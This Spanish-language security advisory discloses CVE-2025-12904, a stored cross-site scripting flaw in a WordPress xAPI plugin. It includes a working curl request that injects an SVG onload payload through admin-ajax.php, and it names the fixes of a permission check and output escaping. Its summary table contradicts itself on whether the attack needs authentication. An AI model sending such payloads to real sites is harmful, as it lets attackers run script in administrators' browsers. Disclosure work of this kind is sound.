
Divulgación para CVE-2025-12904
Divulgación para CVE-2025-12904
Este repositorio divulga una vulnerabilidad descubierta en SNORDIAN's H5PxAPIkatchu <= 0.4.16, un plugin de WordPress desarrollado por otacke.
| ID de CVE | Tipo | Componente | Impacto |
|---|---|---|---|
| CVE-2025-12904 | Cross-Site Scripting Almacenado no Autenticado a través de insert_data | class-table-view.php | Atacante autenticado puede ejecutar JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※Si el id dentro del objeto no existe, fallará.
La función insert_data() no realizaba ninguna comprobación de permisos, lo que permitía guardar entradas maliciosas sin autenticación. Además, estas entradas se mostraban sin escapar en la interfaz de administración.
insert_data() utiliza current_user_can para evitar la ejecución no autorizada.esc_html($value) en lugar de echo $value, se puede prevenir la ejecución de XSS.Fue muy difícil crear el PoC.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
Me tomó mucho tiempo reproducir esta parte. Quiero mejorar en el uso del comando curl. Y además, este plugin... ¿está bien en varios aspectos? Especialmente el nombre, y tal.
Nombre: MooseLove
Rol: Investigador de seguridad independiente / cazador de bugs
Contacto: Disponible bajo solicitud
Este aviso se proporciona para la concienciación pública sobre seguridad. Libre para compartir con atribución.